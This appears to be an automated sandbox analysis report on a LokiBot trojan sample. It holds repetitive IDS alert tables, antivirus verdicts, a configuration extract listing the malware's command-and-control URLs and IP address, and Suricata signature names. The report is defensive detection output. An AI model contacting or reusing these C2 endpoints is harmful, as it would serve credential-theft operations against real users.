                      2025-01-11T01:43:19.935376+010020216411A Network Trojan was detected192.168.2.85124794.156.177.4180TCP
                      2025-01-11T01:43:20.826439+010020216411A Network Trojan was detected192.168.2.85124894.156.177.4180TCP
                      2025-01-11T01:43:21.716741+010020216411A Network Trojan was detected192.168.2.85124994.156.177.4180TCP
                      2025-01-11T01:43:22.578331+010020216411A Network Trojan was detected192.168.2.85125094.156.177.4180TCP
                      2025-01-11T01:43:23.456554+010020216411A Network Trojan was detected192.168.2.85125194.156.177.4180TCP
                      2025-01-11T01:43:24.327063+010020216411A Network Trojan was detected192.168.2.85125294.156.177.4180TCP
                      2025-01-11T01:43:25.184735+010020216411A Network Trojan was detected192.168.2.85125394.156.177.4180TCP
                      2025-01-11T01:43:26.109254+010020216411A Network Trojan was detected192.168.2.85125494.156.177.4180TCP
                      2025-01-11T01:43:26.979791+010020216411A Network Trojan was detected192.168.2.85125594.156.177.4180TCP
                      2025-01-11T01:43:27.847811+010020216411A Network Trojan was detected192.168.2.85125694.156.177.4180TCP
                      2025-01-11T01:43:28.764296+010020216411A Network Trojan was detected192.168.2.85125794.156.177.4180TCP
                      2025-01-11T01:43:29.742691+010020216411A Network Trojan was detected192.168.2.85125894.156.177.4180TCP
                      2025-01-11T01:43:30.877186+010020216411A Network Trojan was detected192.168.2.85125994.156.177.4180TCP
                      2025-01-11T01:43:31.748335+010020216411A Network Trojan was detected192.168.2.85126094.156.177.4180TCP
                      2025-01-11T01:43:32.607831+010020216411A Network Trojan was detected192.168.2.85126194.156.177.4180TCP
                      2025-01-11T01:43:33.949545+010020216411A Network Trojan was detected192.168.2.85126294.156.177.4180TCP
                      2025-01-11T01:43:34.814322+010020216411A Network Trojan was detected192.168.2.85126394.156.177.4180TCP
                      2025-01-11T01:43:35.685742+010020216411A Network Trojan was detected192.168.2.85126494.156.177.4180TCP
                      2025-01-11T01:43:36.565085+010020216411A Network Trojan was detected192.168.2.85126694.156.177.4180TCP
                      2025-01-11T01:43:37.485335+010020216411A Network Trojan was detected192.168.2.85127394.156.177.4180TCP
                      2025-01-11T01:43:38.387023+010020216411A Network Trojan was detected192.168.2.85128094.156.177.4180TCP
                      2025-01-11T01:43:39.246713+010020216411A Network Trojan was detected192.168.2.85128994.156.177.4180TCP
                      2025-01-11T01:43:40.188662+010020216411A Network Trojan was detected192.168.2.85129794.156.177.4180TCP
                      2025-01-11T01:43:41.063388+010020216411A Network Trojan was detected192.168.2.85130394.156.177.4180TCP
                      2025-01-11T01:43:42.036690+010020216411A Network Trojan was detected192.168.2.85130994.156.177.4180TCP
                      2025-01-11T01:43:42.952923+010020216411A Network Trojan was detected192.168.2.85131594.156.177.4180TCP
                      2025-01-11T01:43:43.902308+010020216411A Network Trojan was detected192.168.2.85132194.156.177.4180TCP
                      2025-01-11T01:43:44.785246+010020216411A Network Trojan was detected192.168.2.85132794.156.177.4180TCP
                      2025-01-11T01:43:45.736146+010020216411A Network Trojan was detected192.168.2.85133394.156.177.4180TCP
                      2025-01-11T01:43:46.597242+010020216411A Network Trojan was detected192.168.2.85133994.156.177.4180TCP
                      2025-01-11T01:43:47.457823+010020216411A Network Trojan was detected192.168.2.85134694.156.177.4180TCP
                      2025-01-11T01:43:48.358447+010020216411A Network Trojan was detected192.168.2.85135394.156.177.4180TCP
                      2025-01-11T01:43:49.238277+010020216411A Network Trojan was detected192.168.2.85136094.156.177.4180TCP
                      2025-01-11T01:43:50.112871+010020216411A Network Trojan was detected192.168.2.85136894.156.177.4180TCP
                      2025-01-11T01:43:50.991939+010020216411A Network Trojan was detected192.168.2.85137494.156.177.4180TCP
                      2025-01-11T01:43:51.872833+010020216411A Network Trojan was detected192.168.2.85138094.156.177.4180TCP
                      2025-01-11T01:43:53.011219+010020216411A Network Trojan was detected192.168.2.85138894.156.177.4180TCP
                      2025-01-11T01:43:53.904054+010020216411A Network Trojan was detected192.168.2.85139594.156.177.4180TCP
                      2025-01-11T01:43:54.763804+010020216411A Network Trojan was detected192.168.2.85140394.156.177.4180TCP
                      2025-01-11T01:43:55.926731+010020216411A Network Trojan was detected192.168.2.85140694.156.177.4180TCP
                      2025-01-11T01:43:56.799040+010020216411A Network Trojan was detected192.168.2.85141594.156.177.4180TCP
                      2025-01-11T01:43:57.706794+010020216411A Network Trojan was detected192.168.2.85142194.156.177.4180TCP
                      2025-01-11T01:43:58.606872+010020216411A Network Trojan was detected192.168.2.85142794.156.177.4180TCP
                      2025-01-11T01:43:59.461313+010020216411A Network Trojan was detected192.168.2.85143394.156.177.4180TCP
                      2025-01-11T01:44:00.327731+010020216411A Network Trojan was detected192.168.2.85143994.156.177.4180TCP
                      2025-01-11T01:44:01.206037+010020216411A Network Trojan was detected192.168.2.85144694.156.177.4180TCP
                      2025-01-11T01:44:02.066708+010020216411A Network Trojan was detected192.168.2.85145494.156.177.4180TCP
                      2025-01-11T01:44:03.052322+010020216411A Network Trojan was detected192.168.2.85145994.156.177.4180TCP
                      2025-01-11T01:44:03.938794+010020216411A Network Trojan was detected192.168.2.85146894.156.177.4180TCP
                      2025-01-11T01:44:04.874883+010020216411A Network Trojan was detected192.168.2.85147494.156.177.4180TCP
                      2025-01-11T01:44:05.900134+010020216411A Network Trojan was detected192.168.2.85148094.156.177.4180TCP
                      2025-01-11T01:44:06.794404+010020216411A Network Trojan was detected192.168.2.85148694.156.177.4180TCP
                      2025-01-11T01:44:07.842580+010020216411A Network Trojan was detected192.168.2.85149794.156.177.4180TCP
                      2025-01-11T01:44:08.809214+010020216411A Network Trojan was detected192.168.2.85150394.156.177.4180TCP
                      2025-01-11T01:44:09.691470+010020216411A Network Trojan was detected192.168.2.85150994.156.177.4180TCP
                      2025-01-11T01:44:10.558794+010020216411A Network Trojan was detected192.168.2.85151594.156.177.4180TCP
                      2025-01-11T01:44:11.428450+010020216411A Network Trojan was detected192.168.2.85152194.156.177.4180TCP
                      2025-01-11T01:44:12.445729+010020216411A Network Trojan was detected192.168.2.85153194.156.177.4180TCP
                      2025-01-11T01:44:13.353273+010020216411A Network Trojan was detected192.168.2.85153794.156.177.4180TCP
                      2025-01-11T01:44:14.206617+010020216411A Network Trojan was detected192.168.2.85154494.156.177.4180TCP
                      2025-01-11T01:44:15.088828+010020216411A Network Trojan was detected192.168.2.85155094.156.177.4180TCP
                      2025-01-11T01:44:16.015685+010020216411A Network Trojan was detected192.168.2.85155794.156.177.4180TCP
                      2025-01-11T01:44:16.870270+010020216411A Network Trojan was detected192.168.2.85156594.156.177.4180TCP
                      2025-01-11T01:44:17.776454+010020216411A Network Trojan was detected192.168.2.85157194.156.177.4180TCP
                      2025-01-11T01:44:18.905117+010020216411A Network Trojan was detected192.168.2.85157794.156.177.4180TCP
                      2025-01-11T01:44:19.764965+010020216411A Network Trojan was detected192.168.2.85158194.156.177.4180TCP
                      2025-01-11T01:44:20.625881+010020216411A Network Trojan was detected192.168.2.85158294.156.177.4180TCP
                      2025-01-11T01:44:21.737700+010020216411A Network Trojan was detected192.168.2.85158394.156.177.4180TCP
                      2025-01-11T01:44:22.607373+010020216411A Network Trojan was detected192.168.2.85158494.156.177.4180TCP
                      2025-01-11T01:44:23.517156+010020216411A Network Trojan was detected192.168.2.85158594.156.177.4180TCP
                      2025-01-11T01:44:24.362511+010020216411A Network Trojan was detected192.168.2.85158694.156.177.4180TCP
                      2025-01-11T01:44:25.207598+010020216411A Network Trojan was detected192.168.2.85158794.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T01:42:20.817288+010028257661Malware Command and Control Activity Detected192.168.2.84970494.156.177.4180TCP
                      2025-01-11T01:42:22.238848+010028257661Malware Command and Control Activity Detected192.168.2.84970594.156.177.4180TCP
                      2025-01-11T01:42:23.040247+010028257661Malware Command and Control Activity Detected192.168.2.84970694.156.177.4180TCP
                      2025-01-11T01:42:23.920673+010028257661Malware Command and Control Activity Detected192.168.2.84970794.156.177.4180TCP
                      2025-01-11T01:42:25.197136+010028257661Malware Command and Control Activity Detected192.168.2.84970894.156.177.4180TCP
                      2025-01-11T01:42:26.102355+010028257661Malware Command and Control Activity Detected192.168.2.84970994.156.177.4180TCP
                      2025-01-11T01:42:26.968789+010028257661Malware Command and Control Activity Detected192.168.2.84971094.156.177.4180TCP
                      2025-01-11T01:42:28.135810+010028257661Malware Command and Control Activity Detected192.168.2.84971194.156.177.4180TCP
                      2025-01-11T01:42:29.019551+010028257661Malware Command and Control Activity Detected192.168.2.84971294.156.177.4180TCP
                      2025-01-11T01:42:29.891718+010028257661Malware Command and Control Activity Detected192.168.2.84971394.156.177.4180TCP
                      2025-01-11T01:42:31.084444+010028257661Malware Command and Control Activity Detected192.168.2.84971494.156.177.4180TCP
                      2025-01-11T01:42:31.992422+010028257661Malware Command and Control Activity Detected192.168.2.84971594.156.177.4180TCP
                      2025-01-11T01:42:32.889368+010028257661Malware Command and Control Activity Detected192.168.2.84971694.156.177.4180TCP
                      2025-01-11T01:42:34.065163+010028257661Malware Command and Control Activity Detected192.168.2.84971794.156.177.4180TCP
                      2025-01-11T01:42:34.969892+010028257661Malware Command and Control Activity Detected192.168.2.84971894.156.177.4180TCP
                      2025-01-11T01:42:35.848202+010028257661Malware Command and Control Activity Detected192.168.2.84972094.156.177.4180TCP
                      2025-01-11T01:42:36.756536+010028257661Malware Command and Control Activity Detected192.168.2.84972294.156.177.4180TCP
                      2025-01-11T01:42:37.616845+010028257661Malware Command and Control Activity Detected192.168.2.84972394.156.177.4180TCP
                      2025-01-11T01:42:38.534914+010028257661Malware Command and Control Activity Detected192.168.2.84972494.156.177.4180TCP
                      2025-01-11T01:42:39.453290+010028257661Malware Command and Control Activity Detected192.168.2.84972594.156.177.4180TCP
                      2025-01-11T01:42:40.352448+010028257661Malware Command and Control Activity Detected192.168.2.84972694.156.177.4180TCP
                      2025-01-11T01:42:41.207139+010028257661Malware Command and Control Activity Detected192.168.2.84972794.156.177.4180TCP
                      2025-01-11T01:42:42.069381+010028257661Malware Command and Control Activity Detected192.168.2.84972894.156.177.4180TCP
                      2025-01-11T01:42:42.979513+010028257661Malware Command and Control Activity Detected192.168.2.84972994.156.177.4180TCP
                      2025-01-11T01:42:44.030365+010028257661Malware Command and Control Activity Detected192.168.2.84973094.156.177.4180TCP
                      2025-01-11T01:42:44.878656+010028257661Malware Command and Control Activity Detected192.168.2.84973194.156.177.4180TCP
                      2025-01-11T01:42:45.910982+010028257661Malware Command and Control Activity Detected192.168.2.84973294.156.177.4180TCP
                      2025-01-11T01:42:46.766963+010028257661Malware Command and Control Activity Detected192.168.2.84973394.156.177.4180TCP
                      2025-01-11T01:42:47.676875+010028257661Malware Command and Control Activity Detected192.168.2.84973494.156.177.4180TCP
                      2025-01-11T01:42:48.545843+010028257661Malware Command and Control Activity Detected192.168.2.84973594.156.177.4180TCP
                      2025-01-11T01:42:49.438319+010028257661Malware Command and Control Activity Detected192.168.2.84973694.156.177.4180TCP
                      2025-01-11T01:42:50.341121+010028257661Malware Command and Control Activity Detected192.168.2.84973794.156.177.4180TCP
                      2025-01-11T01:42:51.209451+010028257661Malware Command and Control Activity Detected192.168.2.84973894.156.177.4180TCP
                      2025-01-11T01:42:52.288988+010028257661Malware Command and Control Activity Detected192.168.2.84973994.156.177.4180TCP
                      2025-01-11T01:42:53.175499+010028257661Malware Command and Control Activity Detected192.168.2.84974094.156.177.4180TCP
                      2025-01-11T01:42:54.184422+010028257661Malware Command and Control Activity Detected192.168.2.84974194.156.177.4180TCP
                      2025-01-11T01:42:55.035617+010028257661Malware Command and Control Activity Detected192.168.2.84974294.156.177.4180TCP
                      2025-01-11T01:42:55.992626+010028257661Malware Command and Control Activity Detected192.168.2.84974394.156.177.4180TCP
                      2025-01-11T01:42:56.917464+010028257661Malware Command and Control Activity Detected192.168.2.84974494.156.177.4180TCP
                      2025-01-11T01:42:57.813692+010028257661Malware Command and Control Activity Detected192.168.2.84974594.156.177.4180TCP
                      2025-01-11T01:42:58.986101+010028257661Malware Command and Control Activity Detected192.168.2.84974694.156.177.4180TCP
                      2025-01-11T01:43:00.003340+010028257661Malware Command and Control Activity Detected192.168.2.84974794.156.177.4180TCP
                      2025-01-11T01:43:00.875736+010028257661Malware Command and Control Activity Detected192.168.2.84974894.156.177.4180TCP
                      2025-01-11T01:43:01.944954+010028257661Malware Command and Control Activity Detected192.168.2.84974994.156.177.4180TCP
                      2025-01-11T01:43:02.826098+010028257661Malware Command and Control Activity Detected192.168.2.84975094.156.177.4180TCP
                      2025-01-11T01:43:03.707674+010028257661Malware Command and Control Activity Detected192.168.2.85123094.156.177.4180TCP
                      2025-01-11T01:43:04.854034+010028257661Malware Command and Control Activity Detected192.168.2.85123194.156.177.4180TCP
                      2025-01-11T01:43:05.736299+010028257661Malware Command and Control Activity Detected192.168.2.85123294.156.177.4180TCP
                      2025-01-11T01:43:06.614277+010028257661Malware Command and Control Activity Detected192.168.2.85123394.156.177.4180TCP
                      2025-01-11T01:43:07.773450+010028257661Malware Command and Control Activity Detected192.168.2.85123494.156.177.4180TCP
                      2025-01-11T01:43:08.660221+010028257661Malware Command and Control Activity Detected192.168.2.85123594.156.177.4180TCP
                      2025-01-11T01:43:09.514398+010028257661Malware Command and Control Activity Detected192.168.2.85123694.156.177.4180TCP
                      2025-01-11T01:43:10.707200+010028257661Malware Command and Control Activity Detected192.168.2.85123794.156.177.4180TCP
                      2025-01-11T01:43:11.607612+010028257661Malware Command and Control Activity Detected192.168.2.85123894.156.177.4180TCP
                      2025-01-11T01:43:12.528797+010028257661Malware Command and Control Activity Detected192.168.2.85123994.156.177.4180TCP
                      2025-01-11T01:43:13.572275+010028257661Malware Command and Control Activity Detected192.168.2.85124094.156.177.4180TCP
                      2025-01-11T01:43:14.611221+010028257661Malware Command and Control Activity Detected192.168.2.85124194.156.177.4180TCP
                      2025-01-11T01:43:15.469661+010028257661Malware Command and Control Activity Detected192.168.2.85124294.156.177.4180TCP
                      2025-01-11T01:43:16.338867+010028257661Malware Command and Control Activity Detected192.168.2.85124394.156.177.4180TCP
                      2025-01-11T01:43:17.186517+010028257661Malware Command and Control Activity Detected192.168.2.85124494.156.177.4180TCP
                      2025-01-11T01:43:18.171449+010028257661Malware Command and Control Activity Detected192.168.2.85124594.156.177.4180TCP
                      2025-01-11T01:43:19.049624+010028257661Malware Command and Control Activity Detected192.168.2.85124694.156.177.4180TCP
                      2025-01-11T01:43:19.935376+010028257661Malware Command and Control Activity Detected192.168.2.85124794.156.177.4180TCP
                      2025-01-11T01:43:20.826439+010028257661Malware Command and Control Activity Detected192.168.2.85124894.156.177.4180TCP
                      2025-01-11T01:43:21.716741+010028257661Malware Command and Control Activity Detected192.168.2.85124994.156.177.4180TCP
                      2025-01-11T01:43:22.578331+010028257661Malware Command and Control Activity Detected192.168.2.85125094.156.177.4180TCP
                      2025-01-11T01:43:23.456554+010028257661Malware Command and Control Activity Detected192.168.2.85125194.156.177.4180TCP
                      2025-01-11T01:43:24.327063+010028257661Malware Command and Control Activity Detected192.168.2.85125294.156.177.4180TCP
                      2025-01-11T01:43:25.184735+010028257661Malware Command and Control Activity Detected192.168.2.85125394.156.177.4180TCP
                      2025-01-11T01:43:26.109254+010028257661Malware Command and Control Activity Detected192.168.2.85125494.156.177.4180TCP
                      2025-01-11T01:43:26.979791+010028257661Malware Command and Control Activity Detected192.168.2.85125594.156.177.4180TCP
                      2025-01-11T01:43:27.847811+010028257661Malware Command and Control Activity Detected192.168.2.85125694.156.177.4180TCP
                      2025-01-11T01:43:28.764296+010028257661Malware Command and Control Activity Detected192.168.2.85125794.156.177.4180TCP
                      2025-01-11T01:43:29.742691+010028257661Malware Command and Control Activity Detected192.168.2.85125894.156.177.4180TCP
                      2025-01-11T01:43:30.877186+010028257661Malware Command and Control Activity Detected192.168.2.85125994.156.177.4180TCP
                      2025-01-11T01:43:31.748335+010028257661Malware Command and Control Activity Detected192.168.2.85126094.156.177.4180TCP
                      2025-01-11T01:43:32.607831+010028257661Malware Command and Control Activity Detected192.168.2.85126194.156.177.4180TCP
                      2025-01-11T01:43:33.949545+010028257661Malware Command and Control Activity Detected192.168.2.85126294.156.177.4180TCP
                      2025-01-11T01:43:34.814322+010028257661Malware Command and Control Activity Detected192.168.2.85126394.156.177.4180TCP
                      2025-01-11T01:43:35.685742+010028257661Malware Command and Control Activity Detected192.168.2.85126494.156.177.4180TCP
                      2025-01-11T01:43:36.565085+010028257661Malware Command and Control Activity Detected192.168.2.85126694.156.177.4180TCP
                      2025-01-11T01:43:37.485335+010028257661Malware Command and Control Activity Detected192.168.2.85127394.156.177.4180TCP
                      2025-01-11T01:43:38.387023+010028257661Malware Command and Control Activity Detected192.168.2.85128094.156.177.4180TCP
                      2025-01-11T01:43:39.246713+010028257661Malware Command and Control Activity Detected192.168.2.85128994.156.177.4180TCP
                      2025-01-11T01:43:40.188662+010028257661Malware Command and Control Activity Detected192.168.2.85129794.156.177.4180TCP
                      2025-01-11T01:43:41.063388+010028257661Malware Command and Control Activity Detected192.168.2.85130394.156.177.4180TCP
                      2025-01-11T01:43:42.036690+010028257661Malware Command and Control Activity Detected192.168.2.85130994.156.177.4180TCP
                      2025-01-11T01:43:42.952923+010028257661Malware Command and Control Activity Detected192.168.2.85131594.156.177.4180TCP
                      2025-01-11T01:43:43.902308+010028257661Malware Command and Control Activity Detected192.168.2.85132194.156.177.4180TCP
                      2025-01-11T01:43:44.785246+010028257661Malware Command and Control Activity Detected192.168.2.85132794.156.177.4180TCP
                      2025-01-11T01:43:45.736146+010028257661Malware Command and Control Activity Detected192.168.2.85133394.156.177.4180TCP
                      2025-01-11T01:43:46.597242+010028257661Malware Command and Control Activity Detected192.168.2.85133994.156.177.4180TCP
                      2025-01-11T01:43:47.457823+010028257661Malware Command and Control Activity Detected192.168.2.85134694.156.177.4180TCP
                      2025-01-11T01:43:48.358447+010028257661Malware Command and Control Activity Detected192.168.2.85135394.156.177.4180TCP
                      2025-01-11T01:43:49.238277+010028257661Malware Command and Control Activity Detected192.168.2.85136094.156.177.4180TCP
                      2025-01-11T01:43:50.112871+010028257661Malware Command and Control Activity Detected192.168.2.85136894.156.177.4180TCP
                      2025-01-11T01:43:50.991939+010028257661Malware Command and Control Activity Detected192.168.2.85137494.156.177.4180TCP
                      2025-01-11T01:43:51.872833+010028257661Malware Command and Control Activity Detected192.168.2.85138094.156.177.4180TCP
                      2025-01-11T01:43:53.011219+010028257661Malware Command and Control Activity Detected192.168.2.85138894.156.177.4180TCP
                      2025-01-11T01:43:53.904054+010028257661Malware Command and Control Activity Detected192.168.2.85139594.156.177.4180TCP
                      2025-01-11T01:43:54.763804+010028257661Malware Command and Control Activity Detected192.168.2.85140394.156.177.4180TCP
                      2025-01-11T01:43:55.926731+010028257661Malware Command and Control Activity Detected192.168.2.85140694.156.177.4180TCP
                      2025-01-11T01:43:56.799040+010028257661Malware Command and Control Activity Detected192.168.2.85141594.156.177.4180TCP
                      2025-01-11T01:43:57.706794+010028257661Malware Command and Control Activity Detected192.168.2.85142194.156.177.4180TCP
                      2025-01-11T01:43:58.606872+010028257661Malware Command and Control Activity Detected192.168.2.85142794.156.177.4180TCP
                      2025-01-11T01:43:59.461313+010028257661Malware Command and Control Activity Detected192.168.2.85143394.156.177.4180TCP
                      2025-01-11T01:44:00.327731+010028257661Malware Command and Control Activity Detected192.168.2.85143994.156.177.4180TCP
                      2025-01-11T01:44:01.206037+010028257661Malware Command and Control Activity Detected192.168.2.85144694.156.177.4180TCP
                      2025-01-11T01:44:02.066708+010028257661Malware Command and Control Activity Detected192.168.2.85145494.156.177.4180TCP
                      2025-01-11T01:44:03.052322+010028257661Malware Command and Control Activity Detected192.168.2.85145994.156.177.4180TCP
                      2025-01-11T01:44:03.938794+010028257661Malware Command and Control Activity Detected192.168.2.85146894.156.177.4180TCP
                      2025-01-11T01:44:04.874883+010028257661Malware Command and Control Activity Detected192.168.2.85147494.156.177.4180TCP
                      2025-01-11T01:44:05.900134+010028257661Malware Command and Control Activity Detected192.168.2.85148094.156.177.4180TCP
                      2025-01-11T01:44:06.794404+010028257661Malware Command and Control Activity Detected192.168.2.85148694.156.177.4180TCP
                      2025-01-11T01:44:07.842580+010028257661Malware Command and Control Activity Detected192.168.2.85149794.156.177.4180TCP
                      2025-01-11T01:44:08.809214+010028257661Malware Command and Control Activity Detected192.168.2.85150394.156.177.4180TCP
                      2025-01-11T01:44:09.691470+010028257661Malware Command and Control Activity Detected192.168.2.85150994.156.177.4180TCP
                      2025-01-11T01:44:10.558794+010028257661Malware Command and Control Activity Detected192.168.2.85151594.156.177.4180TCP
                      2025-01-11T01:44:11.428450+010028257661Malware Command and Control Activity Detected192.168.2.85152194.156.177.4180TCP
                      2025-01-11T01:44:12.445729+010028257661Malware Command and Control Activity Detected192.168.2.85153194.156.177.4180TCP
                      2025-01-11T01:44:13.353273+010028257661Malware Command and Control Activity Detected192.168.2.85153794.156.177.4180TCP
                      2025-01-11T01:44:14.206617+010028257661Malware Command and Control Activity Detected192.168.2.85154494.156.177.4180TCP
                      2025-01-11T01:44:15.088828+010028257661Malware Command and Control Activity Detected192.168.2.85155094.156.177.4180TCP
                      2025-01-11T01:44:16.015685+010028257661Malware Command and Control Activity Detected192.168.2.85155794.156.177.4180TCP
                      2025-01-11T01:44:16.870270+010028257661Malware Command and Control Activity Detected192.168.2.85156594.156.177.4180TCP
                      2025-01-11T01:44:17.776454+010028257661Malware Command and Control Activity Detected192.168.2.85157194.156.177.4180TCP
                      2025-01-11T01:44:18.905117+010028257661Malware Command and Control Activity Detected192.168.2.85157794.156.177.4180TCP
                      2025-01-11T01:44:19.764965+010028257661Malware Command and Control Activity Detected192.168.2.85158194.156.177.4180TCP
                      2025-01-11T01:44:20.625881+010028257661Malware Command and Control Activity Detected192.168.2.85158294.156.177.4180TCP
                      2025-01-11T01:44:21.737700+010028257661Malware Command and Control Activity Detected192.168.2.85158394.156.177.4180TCP
                      2025-01-11T01:44:22.607373+010028257661Malware Command and Control Activity Detected192.168.2.85158494.156.177.4180TCP
                      2025-01-11T01:44:23.517156+010028257661Malware Command and Control Activity Detected192.168.2.85158594.156.177.4180TCP
                      2025-01-11T01:44:24.362511+010028257661Malware Command and Control Activity Detected192.168.2.85158694.156.177.4180TCP
                      2025-01-11T01:44:25.207598+010028257661Malware Command and Control Activity Detected192.168.2.85158794.156.177.4180TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: EozUxz4ybi.exeAvira: detected
                      Source: http://94.156.177.41/simple/five/fre.phpAvira URL Cloud: Label: malware
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                      Source: EozUxz4ybi.exeVirustotal: Detection: 86%Perma Link
                      Source: EozUxz4ybi.exeReversingLabs: Detection: 100%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: EozUxz4ybi.exeJoe Sandbox ML: detected
                      Source: EozUxz4ybi.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 4x nop then xor byte ptr [esi], bl0_2_004036F2
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h0_2_004036F2

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49710 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49734 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49710 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49710 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49740 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49735 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49735 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49740 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49735 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49734 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49740 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49723 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49734 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49723 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49710 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49723 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49717 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51240 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51253 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49717 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49730 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49710 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51253 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51240 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49730 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49729 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51263 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51240 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51253 -> 94.156.177.41:80
